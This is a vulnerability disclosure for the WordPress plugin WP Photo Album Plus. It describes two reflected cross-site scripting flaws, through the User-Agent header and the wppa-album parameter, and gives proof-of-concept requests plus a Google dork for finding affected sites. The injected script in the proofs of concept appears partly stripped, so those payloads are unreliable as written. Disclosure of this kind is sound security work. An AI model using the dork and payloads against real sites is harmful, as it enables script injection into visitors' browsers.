WP Photo Album Plus Security Vulnerabilities Author: Milhouse Download: https://wordpress.org/plugins/wp-photo-album-plus/ Home Page: http://wppa.opajaap.nl/ Google dork: inurl:wp-content/plugins/wp-photo-album-plus Set up: Wordpress Version: 3.9.1, 3.9.2 WP Photo Album Plus version: 5.4.4, 5.4.3 Client browsers: FireFox 31, Internet Explorer 8-11 Issue number 1: A Cross-Site Scripting (reflective) vulnerability. Details: The plugin echoes the value of the http header “User-Agent” back to the client browser. Allowing un-sanitized java script to be inserted. Severity: Low Proof of Concept (POC): Request: GET / HTTP/1.1 Accept: text/html, application/xhtml+xml, */* Accept-Language: en-US User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0) 47b5a-->0aa96 Accept-Encoding: gzip, deflate Host: DNT: 1 Proxy-Connection: Keep-Alive Pragma: no-cache Issue number 2: A Cross-site Scripting (reflective)vulnerability. Details: The value of the wppa-album parameter is inserted into a java script string. A supplied payload in the wppa-album parameter is echoed back unmodified to the client browser. Severity: High Proof of Concept (POC): http://vulnerablesite.example/?page_id=109&wppa- album=0178d4<%2fscript>